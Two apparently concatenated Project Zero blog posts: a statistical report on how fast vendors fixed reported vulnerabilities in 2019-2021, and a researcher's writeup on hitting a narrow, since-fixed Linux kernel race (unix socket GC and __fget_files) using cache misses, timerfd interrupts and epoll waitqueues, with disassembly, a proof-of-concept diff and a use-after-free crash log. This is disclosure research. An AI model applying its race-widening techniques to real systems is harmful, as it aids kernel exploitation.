In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.
Overview
For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.
To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.
For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).
There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.
The data!
Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.
Deadline adherence
Once a vendor receives a bug report underour standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.
In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.
Deadline adherence and fix time 2019-2021, by bug report volume
Vendor
Total bugs
Fixed by day 90
Fixed during grace period
Exceeded deadline
& grace period
Avg days to fix
Apple
84
73 (87%)
7 (8%)
4 (5%)
69
Microsoft
80
61 (76%)
15 (19%)
4 (5%)
83
Google
56
53 (95%)
2 (4%)
1 (2%)
44
Linux
25
24 (96%)
0 (0%)
1 (4%)
25
Adobe
19
15 (79%)
4 (21%)
0 (0%)
65
Mozilla
10
9 (90%)
1 (10%)
0 (0%)
46
Samsung
10
8 (80%)
2 (20%)
0 (0%)
72
Oracle
7
3 (43%)
0 (0%)
4 (57%)
109
Others*
55
48 (87%)
3 (5%)
4 (7%)
44
TOTAL
346
294 (84%)
34 (10%)
18 (5%)
61
* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.
Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).
Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.
Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:
Bug fix time 2019-2021, by bug report volume
Vendor
Bugs in 2019
(avg days to fix)
Bugs in 2020
(avg days to fix)
Bugs in 2021
(avg days to fix)
Apple
61 (71)
13 (63)
11 (64)
Microsoft
46 (85)
18 (87)
16 (76)
Google
26 (49)
13 (22)
17 (53)
Linux
12 (32)
8 (22)
5 (15)
Others*
54 (63)
35 (54)
14 (29)
TOTAL
199 (67)
87 (54)
63 (52)
* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.
From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.
Finally, focusing on just 2021, we see:
Only 1 deadline exceeded, versus an average of 9 per year in the other two years
The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years
Mobile phones
Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.
Vendor
Total bugs
Avg fix time
iOS
76
70
Android (Samsung)
10
72
Android (Pixel)
6
72
The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.
Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc).However, open-source products do provide a window into where time is spent.
Browsers
For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.
Fix time analysis for open-source browsers, by bug volume
Browser
Bugs
Avg days from bug report to public patch
Avg days from public patch to release
Avg days from bug report to release
Chrome
40
5.3
24.6
29.9
WebKit
27
11.6
61.1
72.7
Firefox
8
16.6
21.1
37.8
Total
75
8.8
37.3
46.1
We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:
The table and chart together tell us a few things:
Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)
Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.
WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.
Analysis, hopes, and dreams
Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.
One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.
For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle.On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.
For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.
For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.
Moving forward
This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.
To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.
How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:
use a cache miss to widen the race window a little bit
make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll
Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.
Introduction
I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.
This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.
This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.
In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.
When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)
One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:
While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:
And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:
The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.
[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]
My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:
[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]
The race
There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:
static struct file *__fget_files(struct files_struct *files, unsigned int fd,
else if (!get_file_rcu_many(file, refs)) // race window end
goto loop;
}
rcu_read_unlock();
return file;
}
In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").
In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:
<__fget_files+0x4e> je ffffffff812e3def <__fget_files+0x6f>
<__fget_files+0x50> lea rcx,[rsi+rax*1]
<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)
As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.
Missing some cache
Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)
For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).
However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.
An interruption
Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?
On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.
One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.
(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)
Setting an alarm
A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).
High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.
The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...
[Sidenote] Absolute timers: Not quite absolute
So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).
However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.
Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)
A really big list of things to do
Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?
Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.
Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.
When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.
And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
Measuring race outcomes
A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:
If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
If dup() returns a file descriptor:
If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
If it returns the old victim FD number:
If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.
Results: Debian kernel, on Tiger Lake
I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.
Results: Other kernel, on Skylake
These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)
The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!
How important is the cache miss?
The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):
@@ -312,8 +312,10 @@
}
+#if 0
// bounce socket's file refcount over to other cpu
pin_to(2);
close(SYSCHK(dup(RESURRECT_FD+1-1)));
pin_to(1);
+#endif
//printf("setting timer\n");
@@ -352,5 +354,5 @@
close(loop_root);
while (ts_is_in_future(spin_stop))
- close(SYSCHK(dup(FAKE_RESURRECT_FD)));
+ close(SYSCHK(dup(RESURRECT_FD)));
while (ts_is_in_future(my_launch_ts)) /*spin*/;
With that patch, the race outcomes look like this on the Tiger Lake laptop:
But wait, those graphs make no sense!
If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):
Sure, maybe there is some microarchitectural state that is different between runs, causing timing variations - cache state, branch predictor state, frequency scaling, or something along those lines -, but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:
But what the graphs are showing is more of a smooth, linear transition, like this:
And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.
So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?
I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:
As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing difference is also very close to the crystal clock frequency - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:
This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.
But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):
So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.
Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.
The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?
The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:
Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.
(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)
I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.
(No) surprise: clock speed matters
Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.
Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.
Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and itscallees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):
So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.
But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)
Causing a UAF
Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall because details of execution timing are really difficult to understand in detail, and to understand it completely, it might be necessary to use something like Gamozo Labs' "Sushi Roll" and then go through every single instruction in detail and compare the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!
To turn this bug into memory corruption, we have to abuse that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up - here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:
To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():
/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().
But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.
I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.
When a normal distro kernel is running normally, the UAF reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then a poison overwrite detection, showing that one byte of the poison was incremented:
general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI
Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...
This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.
Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)
Appendix: How impatient are interrupts?
